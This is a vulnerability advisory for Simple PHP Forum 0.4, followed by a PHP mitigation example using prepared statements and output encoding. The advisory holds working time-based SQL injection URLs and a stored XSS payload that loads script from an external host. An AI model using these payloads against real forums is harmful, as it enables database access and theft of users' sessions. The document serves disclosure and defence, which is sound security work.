# Author: loneferret of Offensive Security
# Product: sphpforum
# Version: 0.4 (older versions may be affected)
#
# Software Download: http://sourceforge.net/projects/sphpforum/

# Description:
# Simple PHP Forum is a PHP-based forum/BBS board designed to be small, simple,
# fast and to allow easy integration into any existing web site.

# Vulnerability:
# Due to improper input sanitization, parameters are prone to SQL injection. Stored
# cross-site scripting is also present in some forms.

# PoC 1:
# SQL Injection
# Page: view_topic.php / view_profile.php?
# Vulnerable param: 'id'
# http://172.16.194.148/sphpforum/sphpforum-0.4/view_topic.php?id=50%27%20and%20sleep%2810%29%20and%20%271%27=%271
# http://172.16.194.148/sphpforum/sphpforum-0.4/view_profile.php?id=loneferret%27%20and%20sleep%2810%29%20and%20%271%27=%271

# PoC 2:
# Stored XSS
# Page: create_topic.php
# Vulnerable field: Topic
# Payload: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
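
# Mitigation example (added here, not part of the original advisory and not sphpforum code):
# the 'id' parameter is validated and bound instead of concatenated into the query, and the
# stored Topic is HTML-encoded on output. The topics table, its columns and the function
# names fetchTopic/renderTitle are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not sphpforum code. Table/column names (topics, id, title)
// and the function names are assumptions; in-memory SQLite stands in for the
// forum's database so the script runs offline (needs the pdo_sqlite extension).

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE topics (id INTEGER PRIMARY KEY, title TEXT NOT NULL)');

// Constructed sample row: the title is the Topic payload quoted in PoC 2.
$insert = $db->prepare('INSERT INTO topics (id, title) VALUES (:id, :title)');
$insert->execute([
    ':id' => 50,
    ':title' => '<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>',
]);

/** Look up a topic; returns null unless $rawId is a plain decimal id. */
function fetchTopic(PDO $db, string $rawId): ?array
{
    if (!ctype_digit($rawId)) {          // allow-list: digits only
        return null;
    }
    // Bound parameter: the value is sent as data, never spliced into the SQL.
    $stmt = $db->prepare('SELECT id, title FROM topics WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** Encode a stored value for an HTML text or quoted-attribute context. */
function renderTitle(string $title): string
{
    return htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The decoded 'id' value from PoC 1 is rejected before any query runs.
$poc = urldecode('50%27%20and%20sleep%2810%29%20and%20%271%27=%271');
var_dump(fetchTopic($db, $poc));

// A legitimate id returns the row, and its title is encoded on output.
$topic = fetchTopic($db, '50');
echo renderTitle($topic['title']), PHP_EOL;
```

# For view_profile.php, where 'id' is a user name rather than a number, the same bound-parameter
# pattern applies with PDO::PARAM_STR in place of the digit check and integer cast.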